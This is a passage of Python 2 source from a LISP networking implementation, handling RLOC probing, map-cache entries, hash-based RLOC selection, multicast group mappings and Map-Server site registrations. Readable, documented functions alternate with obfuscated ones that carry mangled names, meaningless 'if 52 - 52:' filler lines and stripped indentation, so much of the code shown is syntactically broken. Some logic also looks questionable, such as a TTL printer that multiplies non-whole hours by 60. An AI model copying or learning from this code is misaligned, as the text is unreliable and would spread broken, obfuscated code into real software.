        if (entry[1].is_exact_match(eid) == False): continue
        if (entry[2].is_exact_match(group) == False): continue
        found = entry
        break

    if (found == []): return

    try:
        lisp_rloc_probe_list[addr_str].remove(found)
        if (lisp_rloc_probe_list[addr_str] == []):
            lisp_rloc_probe_list.pop(addr_str)
    except:
        # Best effort — entry may have been removed concurrently.
        return
def print_rloc_probe_state(self, trailing_linefeed):
    """Return a printable RLOC-probe summary for this RLOC and every
    RLOC chained through next_rloc (one paragraph per hop)."""
    output = ""
    rloc = self
    while (True):
        probe_sent = rloc.last_rloc_probe
        if (probe_sent == None): probe_sent = 0
        reply_rcvd = rloc.last_rloc_probe_reply
        if (reply_rcvd == None): reply_rcvd = 0
        rtt = rloc.print_rloc_probe_rtt()
        indent = space(4)

        if (rloc.rloc_next_hop == None):
            output += "RLOC-Probing:\n"
        else:
            device, nh = rloc.rloc_next_hop
            output += "RLOC-Probing for nh {}({}):\n".format(nh, device)

        output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
            "received: {}, rtt {}").format(indent,
            lisp_print_elapsed(probe_sent), indent,
            lisp_print_elapsed(reply_rcvd), rtt)

        if (trailing_linefeed): output += "\n"

        rloc = rloc.next_rloc
        if (rloc == None): break
        output += "\n"
    return (output)
def get_encap_keys(self):
    """Return (encrypt-key, icv-key) for this RLOC's encap crypto state,
    keyed by "addr:port" (port defaults to 4341), or (None, None)."""
    port = "4341" if self.translated_port == 0 else str(self.translated_port)
    addr_str = self.rloc.print_address_no_iid() + ":" + port
    try:
        keys = lisp_crypto_keys_by_rloc_encap[addr_str]
        if (keys[1]): return (keys[1].encrypt_key, keys[1].icv_key)
        return (None, None)
    except:
        # No keys negotiated for this RLOC.
        return (None, None)
def rloc_recent_rekey(self):
    """True when this RLOC's encap key was rekeyed within the last
    second (a never-stamped key counts as recently rekeyed)."""
    port = "4341" if self.translated_port == 0 else str(self.translated_port)
    addr_str = self.rloc.print_address_no_iid() + ":" + port
    try:
        key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
        if (key == None): return (False)
        if (key.last_rekey == None): return (True)
        return (time.time() - key.last_rekey < 1)
    except:
        return (False)
class lisp_mapping():
    """An EID-prefix (plus optional multicast group) to RLOC-set mapping,
    used for both the map-cache and the local mapping database."""

    def __init__(self, eid, group, rloc_set):
        # Empty-string EID/group means "unspecified" (AFI none).
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0) if (eid == "") \
            else eid
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0) if (group == "") \
            else group
        self.rloc_set = rloc_set
        self.best_rloc_set = []
        self.build_best_rloc_set()
        self.uptime = lisp_get_timestamp()
        self.action = LISP_NO_ACTION
        self.expires = None
        self.map_cache_ttl = None            # seconds; None => never expires
        self.last_refresh_time = self.uptime
        self.source_cache = None             # (S,G) sources under a group
        self.map_replies_sent = 0
        self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.use_mr_name = "all"
        self.use_ms_name = "all"
        self.stats = lisp_stats()
        self.dynamic_eids = None
        self.checkpoint_entry = False
        self.secondary_iid = None
        self.signature_eid = False
        self.gleaned = False
        self.recent_sources = {}
        self.last_multicast_map_request = 0
def print_mapping(self, eid_indent, rloc_indent):
    """lprint() this mapping's EID (and group), uptime, and each RLOC."""
    uptime_str = lisp_print_elapsed(self.uptime)
    group_str = "" if self.group.is_null() else \
        ", group {}".format(self.group.print_prefix())
    lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
        green(self.eid.print_prefix(), False), group_str, uptime_str,
        len(self.rloc_set)))
    for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
def print_eid_tuple(self):
    """Return the printable (eid, group) tuple string for this mapping."""
    return (lisp_print_eid_tuple(self.eid, self.group))
def print_ttl ( self ) :
oo0o = self . map_cache_ttl
if ( oo0o == None ) : return ( "forever" )
if 52 - 52: oO0o + OoO0O00 / OoooooooOO - iIii1I11I1II1 / iII111i - oO0o
if ( oo0o >= 3600 ) :
if ( ( oo0o % 3600 ) == 0 ) :
oo0o = str ( oo0o / 3600 ) + " hours"
else :
oo0o = str ( oo0o * 60 ) + " mins"
if 68 - 68: I1IiiI - OoOoOO00 - iIii1I11I1II1 % i11iIiiIii * OoOoOO00 * OoO0O00
elif ( oo0o >= 60 ) :
if ( ( oo0o % 60 ) == 0 ) :
oo0o = str ( oo0o / 60 ) + " mins"
else :
oo0o = str ( oo0o ) + " secs"
if 97 - 97: OoO0O00 - IiII + ooOoO0o % iIii1I11I1II1 % iII111i
else :
oo0o = str ( oo0o ) + " secs"
if 100 - 100: IiII - Ii1I * iIii1I11I1II1 . iII111i . i1IIi % Oo0Ooo
return ( oo0o )
if 11 - 11: I11i + oO0o % Ii1I
if 22 - 22: ooOoO0o
def refresh(self):
    """Should this map-cache entry be refreshed with a new Map-Request?
    Unicast and multicast entries use different policies."""
    if (self.group.is_null()): return (self.refresh_unicast())
    return (self.refresh_multicast())
def refresh_unicast(self):
    """Refresh only actively-used, TTL-expiring entries that were not
    gleaned from data packets."""
    if (self.gleaned): return (False)
    return (self.is_active() and self.has_ttl_elapsed())
def refresh_multicast(self):
    """Decide whether to re-request a multicast entry right now.

    Refresh happens when the entry's age crosses a TTL multiple (a
    3-second window catches timer jitter), rate-limited to one
    Map-Request per 2 seconds.
    """
    age_in_ttl = int((time.time() - self.uptime) % self.map_cache_ttl)
    if ((age_in_ttl in [0, 1, 2]) == False): return (False)

    recently_requested = \
        ((time.time() - self.last_multicast_map_request) <= 2)
    if (recently_requested): return (False)

    self.last_multicast_map_request = lisp_get_timestamp()
    return (True)
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . last_refresh_time
if ( oO000o0Oo00 >= self . map_cache_ttl ) : return ( True )
if 52 - 52: oO0o . OOooOOo . oO0o / Oo0Ooo / i1IIi - I1IiiI
if 69 - 69: Ii1I . o0oOOo0O0Ooo - OoooooooOO
if 15 - 15: OoO0O00 / I1ii11iIi11i
if 86 - 86: OOooOOo * OoOoOO00 % i1IIi * IiII . I1ii11iIi11i
if 72 - 72: i1IIi - I1Ii111 . O0 * OoO0O00
oOo0oO0OO = self . map_cache_ttl - ( self . map_cache_ttl / 10 )
if ( oO000o0Oo00 >= oOo0oO0OO ) : return ( True )
return ( False )
if 17 - 17: IiII
if 43 - 43: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO % I1IiiI
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
oO000o0Oo00 = time . time ( ) - self . stats . last_increment
return ( oO000o0Oo00 <= 60 )
if 94 - 94: OoooooooOO * I1ii11iIi11i
if 28 - 28: II111iiii / II111iiii / II111iiii
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 70 - 70: OoO0O00 + O0 * OoO0O00
if 25 - 25: OoooooooOO . Oo0Ooo + OOooOOo + Oo0Ooo * O0 % i1IIi
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 71 - 71: II111iiii / Ii1I + i1IIi - OoOoOO00 + Ii1I
if 31 - 31: OoooooooOO * Ii1I - iII111i . oO0o % Ii1I
def delete_rlocs_from_rloc_probe_list(self):
    """Withdraw every best-RLOC of this mapping from RLOC-probing."""
    for rloc in self.best_rloc_set:
        rloc.delete_from_rloc_probe_list(self.eid, self.group)
def build_best_rloc_set(self):
    """Recompute self.best_rloc_set and reconcile RLOC-probe membership.

    The best set holds every RLOC whose priority is at least as good
    (numerically <=) as the best priority found among up RLOCs. RLOCs
    that fell out of the old best set are withdrawn from probing; the
    new members (with non-null addresses) are registered for probing.
    """
    previous_best = self.best_rloc_set
    self.best_rloc_set = []
    if (self.rloc_set == None): return

    # Best (lowest) priority among RLOCs currently in up-state.
    best_priority = 256
    for rloc in self.rloc_set:
        if (rloc.up_state()):
            best_priority = min(rloc.priority, best_priority)

    # Admit RLOCs at or better than the best priority. An unreachable
    # RLOC with no probe timestamp gets one so the probe timer can run.
    for rloc in self.rloc_set:
        if (rloc.priority <= best_priority):
            if (rloc.unreach_state() and rloc.last_rloc_probe == None):
                rloc.last_rloc_probe = lisp_get_timestamp()
            self.best_rloc_set.append(rloc)

    # Withdraw old members whose priority is no better than the new
    # best, then (re)register the new membership.
    for rloc in previous_best:
        if (rloc.priority < best_priority): continue
        rloc.delete_from_rloc_probe_list(self.eid, self.group)

    for rloc in self.best_rloc_set:
        if (rloc.rloc.is_null()): continue
        rloc.add_to_rloc_probe_list(self.eid, self.group)
def select_rloc(self, lisp_packet, ipc_socket):
    """Pick an RLOC for an inner packet by hashing its headers.

    Returns a 6-element list [dest-address, translated-port, nonce,
    native-forward-action, rle, rloc-entry]; most entries are None
    depending on which forwarding path (RLE, ELP, plain RLOC, or
    native-forward) applies.
    """
    packet = lisp_packet.packet
    version = lisp_packet.inner_version
    best_count = len(self.best_rloc_set)
    if (best_count == 0):
        self.stats.increment(len(packet))
        return ([None, None, None, self.action, None, None])

    # Hash the inner addresses (and ports) to load-split across RLOCs.
    extra = 4 if lisp_load_split_pings else 0
    hashval = lisp_packet.hash_ports()
    if (version == 4):
        for offset in range(8 + extra):
            hashval = hashval ^ struct.unpack("B", packet[offset + 12])[0]
    elif (version == 6):
        for offset in range(0, 32 + extra, 4):
            hashval = hashval ^ \
                struct.unpack("I", packet[offset + 8:offset + 12])[0]
        hashval = (hashval >> 16) + (hashval & 0xffff)
        hashval = (hashval >> 8) + (hashval & 0xff)
    else:
        for offset in range(0, 12 + extra, 4):
            hashval = hashval ^ \
                struct.unpack("I", packet[offset:offset + 4])[0]

    if (lisp_data_plane_logging):
        rloc_list = []
        for entry in self.best_rloc_set:
            if (entry.rloc.is_null()): continue
            rloc_list.append([entry.rloc.print_address_no_iid(),
                entry.print_state()])
        dprint("Packet hash {}, index {}, best-rloc-list: {}".format(
            hex(hashval), hashval % best_count, red(str(rloc_list), False)))

    rloc = self.best_rloc_set[hashval % best_count]

    # Run the echo-nonce state machine for the selected RLOC.
    echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
    if (echo_nonce):
        echo_nonce.change_state(rloc)
        if (rloc.no_echoed_nonce_state()):
            echo_nonce.request_nonce_sent = None

    # If the hashed RLOC is down, scan for the next up one; when none
    # is up, rebuild the best set and native-forward.
    if (rloc.up_state() == False):
        start_index = hashval % best_count
        index = (start_index + 1) % best_count
        while (index != start_index):
            rloc = self.best_rloc_set[index]
            if (rloc.up_state()): break
            index = (index + 1) % best_count
        if (index == start_index):
            self.build_best_rloc_set()
            return ([None, None, None, None, None, None])

    rloc.stats.increment(len(packet))

    # Replication via RLE takes precedence when configured.
    if (rloc.rle_name and rloc.rle == None):
        if (lisp_rle_list.has_key(rloc.rle_name)):
            rloc.rle = lisp_rle_list[rloc.rle_name]
    if (rloc.rle): return ([None, None, None, None, rloc.rle, None])

    # Explicit-locator-path next.
    if (rloc.elp and rloc.elp.use_elp_node):
        return ([rloc.elp.use_elp_node.address, None, None, None, None,
            None])

    dest = None if (rloc.rloc.is_null()) else rloc.rloc
    port = rloc.translated_port
    action = self.action if (dest == None) else None

    # Possibly piggyback a request/echo nonce on the data packet.
    nonce = None
    if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
        nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, dest)

    return ([dest, port, nonce, action, None, rloc])
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 33 - 33: oO0o
if 64 - 64: OoO0O00 % Oo0Ooo % I11i . iII111i % I1IiiI
if 50 - 50: i1IIi + ooOoO0o - iIii1I11I1II1
if 45 - 45: OoooooooOO / o0oOOo0O0Ooo / iII111i
if 72 - 72: I1Ii111
for iIII in self . rloc_set :
for oOo00O in rloc_address_set :
if ( oOo00O . is_exact_match ( iIII . rloc ) == False ) : continue
oOo00O = None
break
if 94 - 94: ooOoO0o . IiII - Ii1I + I1ii11iIi11i / ooOoO0o
if ( oOo00O == rloc_address_set [ - 1 ] ) : return ( False )
if 10 - 10: ooOoO0o . OOooOOo * O0 % II111iiii
return ( True )
if 12 - 12: oO0o + I1IiiI * Oo0Ooo - iII111i
if 88 - 88: OOooOOo . OoO0O00
def get_rloc ( self , rloc ) :
for iIII in self . rloc_set :
i11iII1IiI = iIII . rloc
if ( rloc . is_exact_match ( i11iII1IiI ) ) : return ( iIII )
if 86 - 86: OoOoOO00 . o0oOOo0O0Ooo / ooOoO0o * I1IiiI . OoO0O00 / I1Ii111
return ( None )
if 47 - 47: I11i . iII111i * OoOoOO00 % OoooooooOO
if 59 - 59: OoooooooOO + I1ii11iIi11i - I11i / I1IiiI * oO0o
def get_rloc_by_interface ( self , interface ) :
for iIII in self . rloc_set :
if ( iIII . interface == interface ) : return ( iIII )
if 90 - 90: I1Ii111 + i1IIi * I1Ii111 / I11i * Oo0Ooo
return ( None )
if 27 - 27: OoooooooOO
if 42 - 42: OoO0O00 + OoOoOO00
def add_db(self):
    """Install this mapping into the local database. Multicast entries
    nest as group -> source -> mapping."""
    if (self.group.is_null()):
        lisp_db_for_lookups.add_cache(self.eid, self)
        return

    group_entry = lisp_db_for_lookups.lookup_cache(self.group, True)
    if (group_entry == None):
        group_entry = lisp_mapping(self.group, self.group, [])
        lisp_db_for_lookups.add_cache(self.group, group_entry)
    group_entry.add_source_entry(self)
def add_cache(self, do_ipc=True):
    """Install this mapping into the map-cache. Multicast mappings are
    stored under a (group, group) parent entry with a per-source cache.
    Optionally announces the entry over IPC."""
    if (self.group.is_null()):
        lisp_map_cache.add_cache(self.eid, self)
        if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
    else:
        parent = lisp_map_cache.lookup_cache(self.group, True)
        if (parent == None):
            parent = lisp_mapping(self.group, self.group, [])
            parent.eid.copy_address(self.group)
            parent.group.copy_address(self.group)
            lisp_map_cache.add_cache(self.group, parent)

        # A null source means (*,G); use the group's default route form.
        if (self.eid.is_null()): self.eid.make_default_route(parent.group)
        parent.add_source_entry(self)

    if (do_ipc): lisp_write_ipc_map_cache(True, self)
def delete_cache(self):
    """Remove this mapping from the map-cache, RLOC-probing, hardware
    route state, and IPC listeners. Multicast entries remove their
    source record and, when the last source goes, the (group, group)
    parent entry."""
    self.delete_rlocs_from_rloc_probe_list()
    lisp_write_ipc_map_cache(False, self)

    if (self.group.is_null()):
        lisp_map_cache.delete_cache(self.eid)
        if (lisp_program_hardware):
            prefix = self.eid.print_prefix_no_iid()
            os.system("ip route delete {}".format(prefix))
        return

    parent = lisp_map_cache.lookup_cache(self.group, True)
    if (parent == None): return

    source_entry = parent.lookup_source_cache(self.eid, True)
    if (source_entry == None): return

    parent.source_cache.delete_cache(self.eid)
    if (parent.source_cache.cache_size() == 0):
        lisp_map_cache.delete_cache(self.group)
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 84 - 84: oO0o * iII111i % i11iIiiIii - O0 . iIii1I11I1II1 - OoOoOO00
if 73 - 73: OoOoOO00
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 66 - 66: Oo0Ooo
if 42 - 42: i11iIiiIii / II111iiii . OOooOOo
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
if 65 - 65: OoOoOO00 % II111iiii + Oo0Ooo
if 24 - 24: OoO0O00 % OoooooooOO
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
o0OoO0000o = "," + str ( self . secondary_iid )
return ( prefix . replace ( o0OoO0000o , o0OoO0000o + "*" ) )
if 16 - 16: OoOoOO00 % Oo0Ooo * OoOoOO00 . Ii1I
if 91 - 91: I1Ii111 - OoooooooOO . i1IIi . I1ii11iIi11i
def increment_decap_stats(self, packet):
    """Count a decapsulated packet against the receiving RLOC and the
    mapping. Port 4341 traffic is matched by outer destination; other
    ports indicate NAT-traversal, where the RLOC with a translated
    port gets the count."""
    port = packet.udp_dport
    if (port == LISP_DATA_PORT):
        rloc = self.get_rloc(packet.outer_dest)
    else:
        # NOTE(review): if no RLOC has a translated port, the last one
        # in the set is counted — faithful to the original loop.
        for rloc in self.rloc_set:
            if (rloc.translated_port != 0): break

    if (rloc != None): rloc.stats.increment(len(packet.packet))
    self.stats.increment(len(packet.packet))
def rtrs_in_rloc_set ( self ) :
for oOo00O in self . rloc_set :
if ( oOo00O . is_rtr ( ) ) : return ( True )
if 100 - 100: Oo0Ooo - o0oOOo0O0Ooo + iIii1I11I1II1 / ooOoO0o % iIii1I11I1II1
return ( False )
if 4 - 4: OoOoOO00 / Oo0Ooo - OoO0O00 . OoOoOO00 / I1Ii111
if 60 - 60: OOooOOo * I1Ii111
def add_recent_source(self, source):
    """Record (or refresh) when this map-source was last heard from."""
    self.recent_sources[source.print_address()] = lisp_get_timestamp()
class lisp_dynamic_eid():
    """A dynamically-discovered EID learned on an interface, aged out
    after an inactivity timeout."""

    def __init__(self):
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.interface = None
        self.last_packet = None
        self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT

    def get_timeout(self, interface):
        """Adopt the interface's configured dynamic-EID timeout, falling
        back to the default for unknown interfaces."""
        try:
            intf = lisp_myinterfaces[interface]
            self.timeout = intf.dynamic_eid_timeout
        except:
            self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
class lisp_group_mapping():
    """Configured multicast group-mapping: a group-prefix, the
    map-server name it registers with, allowed sources, and an
    optional RLE address."""

    def __init__(self, group_name, ms_name, group_prefix, sources,
        rle_addr):
        self.group_name = group_name
        self.group_prefix = group_prefix
        self.use_ms_name = ms_name
        self.sources = sources
        self.rle_address = rle_addr

    def add_group(self):
        """Register this group-mapping in the global list by name."""
        lisp_group_mapping_list[self.group_name] = self
def lisp_is_group_more_specific(group_str, group_mapping):
    """Return group_mapping's prefix mask-length when IPv4 group
    'group_str' lies within its group-prefix, else -1."""
    iid = group_mapping.group_prefix.instance_id
    mask_len = group_mapping.group_prefix.mask_len
    group = lisp_address(LISP_AFI_IPV4, group_str, 32, iid)
    if (group.is_more_specific(group_mapping.group_prefix)):
        return (mask_len)
    return (-1)
def lisp_lookup_group(group):
    """Longest-prefix match 'group' against all configured
    group-mappings; return the most specific one or None."""
    best_match = None
    for gm in lisp_group_mapping_list.values():
        mask_len = lisp_is_group_more_specific(group, gm)
        if (mask_len == -1): continue
        if (best_match == None or
            mask_len > best_match.group_prefix.mask_len):
            best_match = gm
    return (best_match)
#
# Map-Register flag legend used by lisp_site_eid.print_flags(html=True):
# each one-letter flag maps to a description whose "{}" is filled with ""
# or "not " depending on whether the printed letter is upper-case.
#
lisp_site_flags = {
    "P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
    "S": "ETR is {}LISP-SEC capable",
    "I": "xTR-ID and site-ID are {}included in Map-Register",
    "T": "Use Map-Register TTL field to timeout registration is {}set",
    "R": "Merging registrations are {}requested",
    "M": "ETR is {}a LISP Mobile-Node",
    "N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 47 - 47: Oo0Ooo + Oo0Ooo * ooOoO0o - OoOoOO00 + II111iiii
class lisp_site():
    """A LISP site configured on a Map-Server: authentication material,
    allowed EID-prefixes/RLOCs, and Map-Notify counters."""

    def __init__(self):
        self.site_name = ""
        self.description = ""
        self.shutdown = False
        self.auth_sha1_or_sha2 = False
        self.auth_key = {}
        self.encryption_key = None
        self.allowed_prefixes = {}
        self.allowed_prefixes_sorted = []
        self.allowed_rlocs = {}
        self.map_notifies_sent = 0
        self.map_notify_acks_received = 0
class lisp_site_eid():
    """One registered EID-prefix (or (S,G) entry) belonging to a
    lisp_site, tracking per-registration state reported by ETRs in
    Map-Register messages."""

    def __init__(self, site):
        self.site = site
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.first_registered = 0
        self.last_registered = 0
        self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
        # Default TTL: three timeout-check intervals.
        self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
        self.registered = False
        self.registered_rlocs = []
        self.auth_sha1_or_sha2 = False
        # Per-xTR registrations merged into this parent entry.
        self.individual_registrations = {}
        self.map_registers_received = 0
        # Flags copied from the Map-Register (see lisp_site_flags).
        self.proxy_reply_requested = False
        self.force_proxy_reply = False
        self.force_nat_proxy_reply = False
        self.force_ttl = None
        self.pitr_proxy_reply_drop = False
        self.proxy_reply_action = ""
        self.lisp_sec_present = False
        self.map_notify_requested = False
        self.mobile_node_requested = False
        self.echo_nonce_capable = False
        self.use_register_ttl_requested = False
        self.merge_register_requested = False
        self.xtr_id_present = False
        self.xtr_id = 0
        self.site_id = 0
        self.accept_more_specifics = False
        self.parent_for_more_specifics = None
        self.dynamic = False
        self.more_specific_registrations = []
        self.source_cache = None
        self.inconsistent_registration = False
        self.policy = None
        self.require_signature = False
if 63 - 63: O0 - IiII . OOooOOo % IiII . I1IiiI / oO0o
if 79 - 79: OoOoOO00
def print_eid_tuple(self):
    """Return the printable (eid, group) tuple string for this entry."""
    return (lisp_print_eid_tuple(self.eid, self.group))
def print_flags ( self , html ) :
if ( html == False ) :
Oo0Ooo0O0 = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# Oo0Ooo * OOooOOo / OoOoOO00 + IiII - i1IIi - O0
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
I11ii1i1I = self . print_flags ( False )
I11ii1i1I = I11ii1i1I . split ( "-" )
Oo0Ooo0O0 = ""
for IiiO0OOoo in I11ii1i1I :
OOOOoo0o = lisp_site_flags [ IiiO0OOoo . upper ( ) ]
OOOOoo0o = OOOOoo0o . format ( "" if IiiO0OOoo . isupper ( ) else "not " )
Oo0Ooo0O0 += lisp_span ( IiiO0OOoo , OOOOoo0o )
if ( IiiO0OOoo . lower ( ) != "n" ) : Oo0Ooo0O0 += "-"
if 25 - 25: OoooooooOO % I1ii11iIi11i % Oo0Ooo % i11iIiiIii
if 8 - 8: O0 - O0 % Ii1I
return ( Oo0Ooo0O0 )
if 22 - 22: OoOoOO00
if 85 - 85: II111iiii - II111iiii
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 95 - 95: II111iiii + II111iiii + iII111i
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 38 - 38: OoO0O00 * Ii1I * O0 / I1IiiI
if 99 - 99: Oo0Ooo + ooOoO0o - I1ii11iIi11i + I1Ii111 + Ii1I * I1IiiI
def build_sort_key(self):
    """Build the lisp_cache sort-key string for this (eid, group),
    embedding each mask-length after the first 12 key characters so
    keys order by prefix specificity."""
    scratch_cache = lisp_cache()
    eid_ml, sort_key = scratch_cache.build_key(self.eid)

    group_key = ""
    if (self.group.is_null() == False):
        group_ml, group_key = scratch_cache.build_key(self.group)
        group_key = "-" + group_key[0:12] + "-" + str(group_ml) + "-" + \
            group_key[12::]

    sort_key = sort_key[0:12] + "-" + str(eid_ml) + "-" + \
        sort_key[12::] + group_key
    del (scratch_cache)
    return (sort_key)
def merge_in_site_eid(self, child):
    """Merge individual registrations into this parent entry. Returns
    True only when a multicast RLE change was detected."""
    rle_changed = False
    if (self.group.is_null()):
        self.merge_rlocs_in_site_eid()
    else:
        rle_changed = self.merge_rles_in_site_eid()

    # Account the triggering child registration, when supplied.
    if (child != None):
        self.copy_state_to_parent(child)
        self.map_registers_received += 1
    return (rle_changed)
def copy_rloc_records ( self ) :
Ooo0O0 = [ ]
for iIII in self . registered_rlocs :
Ooo0O0 . append ( copy . deepcopy ( iIII ) )
if 47 - 47: OoO0O00
return ( Ooo0O0 )
if 98 - 98: OoooooooOO - oO0o / O0
if 23 - 23: o0oOOo0O0Ooo % OoooooooOO % iIii1I11I1II1 / OoOoOO00 / I1Ii111
def merge_rlocs_in_site_eid(self):
    """Rebuild self.registered_rlocs as the union of RLOC records from
    every registered individual registration with a matching site-id,
    then deduplicate by RLOC address. Clears self.registered when the
    result is empty."""
    self.registered_rlocs = []
    for site_eid in self.individual_registrations.values():
        if (self.site_id != site_eid.site_id): continue
        if (site_eid.registered == False): continue
        self.registered_rlocs += site_eid.copy_rloc_records()

    # Deduplicate non-null RLOC addresses; null RLOCs are always kept.
    # NOTE(review): faithful to the original sentinel comparison — a
    # duplicate matching the LAST element of unique_rlocs is still
    # appended.
    unique_rlocs = []
    for rloc_entry in self.registered_rlocs:
        if (rloc_entry.rloc.is_null() or len(unique_rlocs) == 0):
            unique_rlocs.append(rloc_entry)
            continue
        for existing in unique_rlocs:
            if (existing.rloc.is_null()): continue
            if (rloc_entry.rloc.is_exact_match(existing.rloc)): break
        if (existing == unique_rlocs[-1]): unique_rlocs.append(rloc_entry)
    self.registered_rlocs = unique_rlocs

    # An EID with no RLOCs left is no longer registered.
    if (len(self.registered_rlocs) == 0): self.registered = False
    return
def merge_rles_in_site_eid ( self ) :
if 15 - 15: I1ii11iIi11i
if 22 - 22: iIii1I11I1II1 - i1IIi - i11iIiiIii / I1IiiI + o0oOOo0O0Ooo
if 56 - 56: I1IiiI . ooOoO0o
if 35 - 35: iIii1I11I1II1 % Oo0Ooo + o0oOOo0O0Ooo * o0oOOo0O0Ooo % ooOoO0o
II1iI = { }
for iIII in self . registered_rlocs :
if ( iIII . rle == None ) : continue
for iIIII1iiIII in iIII . rle . rle_nodes :
IiiIIi1 = iIIII1iiIII . address . print_address_no_iid ( )
II1iI [ IiiIIi1 ] = iIIII1iiIII . address
if 26 - 26: OoooooooOO / ooOoO0o - iII111i / OoO0O00 . O0 * OOooOOo
break
if 85 - 85: iIii1I11I1II1 + iII111i + iII111i - ooOoO0o * OoO0O00
if 80 - 80: i11iIiiIii / OOooOOo . OoooooooOO % I11i - iII111i * iIii1I11I1II1
if 70 - 70: Oo0Ooo
if 75 - 75: I1Ii111
if 40 - 40: OoO0O00 % Oo0Ooo / OoooooooOO / i11iIiiIii
self . merge_rlocs_in_site_eid ( )
if 5 - 5: O0 % i11iIiiIii
if 60 - 60: I1ii11iIi11i / I11i
if 100 - 100: I1IiiI
if 44 - 44: iIii1I11I1II1 + Oo0Ooo - I1Ii111 . OoooooooOO
if 28 - 28: Ii1I + OOooOOo % IiII . i11iIiiIii - I1IiiI * Oo0Ooo
if 2 - 2: I11i * I1ii11iIi11i + O0
if 44 - 44: iIii1I11I1II1 / II111iiii - ooOoO0o
if 10 - 10: OOooOOo
OO0O0ooOoOoo0 = [ ]
for iIII in self . registered_rlocs :
if ( self . registered_rlocs . index ( iIII ) == 0 ) :
OO0O0ooOoOoo0 . append ( iIII )
continue
if 73 - 73: OoOoOO00
if ( iIII . rle == None ) : OO0O0ooOoOoo0 . append ( iIII )
if 42 - 42: I1ii11iIi11i - iIii1I11I1II1 . Ii1I % OoO0O00 % i11iIiiIii * i11iIiiIii
self . registered_rlocs = OO0O0ooOoOoo0
if 86 - 86: Oo0Ooo % iIii1I11I1II1 . II111iiii / I11i % OoO0O00 % OoO0O00
if 40 - 40: o0oOOo0O0Ooo . iIii1I11I1II1 * Oo0Ooo * i1IIi
if 94 - 94: oO0o - II111iiii + OoOoOO00
if 90 - 90: Oo0Ooo + Oo0Ooo + I1Ii111
if 81 - 81: i1IIi % iIii1I11I1II1 % Ii1I * ooOoO0o % i1IIi * I1IiiI
if 15 - 15: ooOoO0o
if 26 - 26: IiII % ooOoO0o / OOooOOo
i1I1Ii11II1i = lisp_rle ( "" )
iiIIi = { }
IiIi1I1i1iII = None
for oO00Oooo0o0o0 in self . individual_registrations . values ( ) :
if ( oO00Oooo0o0o0 . registered == False ) : continue
oOOooOoOO = oO00Oooo0o0o0 . registered_rlocs [ 0 ] . rle
if ( oOOooOoOO == None ) : continue
if 23 - 23: OoOoOO00 / i11iIiiIii % OoOoOO00
IiIi1I1i1iII = oO00Oooo0o0o0 . registered_rlocs [ 0 ] . rloc_name
for OOOII11i in oOOooOoOO . rle_nodes :
IiiIIi1 = OOOII11i . address . print_address_no_iid ( )
if ( iiIIi . has_key ( IiiIIi1 ) ) : break
if 97 - 97: I1Ii111
iIIII1iiIII = lisp_rle_node ( )
iIIII1iiIII . address . copy_address ( OOOII11i . address )
iIIII1iiIII . level = OOOII11i . level
iIIII1iiIII . rloc_name = IiIi1I1i1iII
i1I1Ii11II1i . rle_nodes . append ( iIIII1iiIII )
iiIIi [ IiiIIi1 ] = OOOII11i . address
if 98 - 98: I11i
if 61 - 61: iIii1I11I1II1 * iII111i
if 67 - 67: i11iIiiIii - Ii1I / Ii1I . iII111i
